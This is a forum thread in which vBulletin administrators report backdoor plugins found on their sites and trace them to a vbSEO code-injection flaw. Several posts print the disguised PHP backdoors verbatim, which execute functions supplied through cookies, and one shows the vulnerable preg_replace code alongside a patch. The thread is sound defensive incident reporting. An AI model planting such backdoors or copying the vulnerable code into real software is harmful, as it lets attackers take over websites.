Possible Exploit

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Jafo
    Senior Member
    • Apr 2004
    • 278

    Possible Exploit

    I noticed this plugin in global complete on several of our sites:

    PHP Code:
    /* vBulletin Templates Cookie Caching */
    $vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
    I googled the phrase "vBulletin Templates Cookie Caching" and see someone else noticed it yesterday too:



    All of our installs are running the latest version 3.8.7 PL2. I am going to all the sites and am disabling it as I find them. I have no idea if this is a VB exploit, or vbseo, or any other product we may have installed, but I suggest everyone check their plugin list.. This is installed under the vbulletin product, so it should be right around the top of the list. Still investigating..
  • Jafo
    Senior Member
    • Apr 2004
    • 278

    #2
    Actually I more... This one in the same hook location, different site:

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    I also saw this code:

    Code:
    /* vBulletin Dynamic Menu Filters */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

    Comment

    • Jafo
      Senior Member
      • Apr 2004
      • 278

      #3
      I have just checked a site of ours without vbseo, no exploit. I then checked a personal site of mine that has nothing to do with the other sites and it has vbseo.. The exploit was there. Not a 100% confirmation by any means, just so far out of 20 something sites that I have checked, the one that doesn't have vbseo is not infected. I have quite a few more to check.

      Comment

      • Jafo
        Senior Member
        • Apr 2004
        • 278

        #4
        I just found it on a latest version of vb 4 too..

        Comment

        • Jafo
          Senior Member
          • Apr 2004
          • 278

          #5
          Just got confirmation from a peer that it is on their system too.. The only common thread we have right now is vbseo..

          Comment

          • BirdOPrey5
            Senior Member
            • Jul 2008
            • 9613
            • 5.6.3

            #6
            Have you notified VBSEO?

            Comment

            • Jafo
              Senior Member
              • Apr 2004
              • 278

              #7
              Yes I have, and pointed them to this thread..

              Comment

              • Jafo
                Senior Member
                • Apr 2004
                • 278

                #8
                Just confirmed with 3 other peers in the field. All with vbseo.. People, check your plugins!

                Comment

                • DigitalCrowd
                  Senior Member
                  • Aug 2000
                  • 111
                  • 3.6.x

                  #9
                  I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

                  eval($_COOKIE['c']);

                  Here is a site that references a PHP compromise with similar code...

                  Comment

                  • Ace
                    Senior Member
                    • Apr 2004
                    • 4051
                    • 4.2.X

                    #10
                    If this is the exploit that causes Google searches to redirect elsewhere (a-la filestore.info), the reason vBSEO gets targeted is because it's designed to increase search engine crawling.

                    How they got in is not a vBSEO hole, but more than likely, people not securing all of the writable directories that vBulletin has to offer.
                    My Live vB5 Site - NZEating.com
                    vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                    Comment

                    • Jafo
                      Senior Member
                      • Apr 2004
                      • 278

                      #11
                      Ace, sorry, I disagree. They somehow are attacking the title replace feature to INJECT code. It IS a vbseo hole.. We are narrowing it down...

                      Comment

                      • Ace
                        Senior Member
                        • Apr 2004
                        • 4051
                        • 4.2.X

                        #12
                        OK. Best of luck figuring it out, I'm watching your ticket with great interest.

                        <-- works there.
                        My Live vB5 Site - NZEating.com
                        vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                        Comment

                        • Jafo
                          Senior Member
                          • Apr 2004
                          • 278

                          #13
                          Here it is folks, in functions_vbseocp_abstract.php

                          PHP Code:
                          public static function proc_deutf($ptxt$tocharset)
                          {
                          $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')'$ptxt);
                          return 
                          $ptxt;

                          I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

                          PHP Code:
                          public static function proc_deutf($ptxt$tocharset)
                          {
                          $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')'$ptxt);
                          return 
                          $ptxt;

                          Last edited by Jafo; Mon 23 Jan '12, 7:32am.

                          Comment

                          • briansol
                            Senior Member
                            • Apr 2006
                            • 674
                            • 3.6.x

                            #14
                            Title replaces happen real-time as the page is pulled. These are not stored anywhere.

                            I highly suggest checking your server logs for more detailed information or entries relating to product changes.

                            Comment

                            • Jafo
                              Senior Member
                              • Apr 2004
                              • 278

                              #15
                              Brianso, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...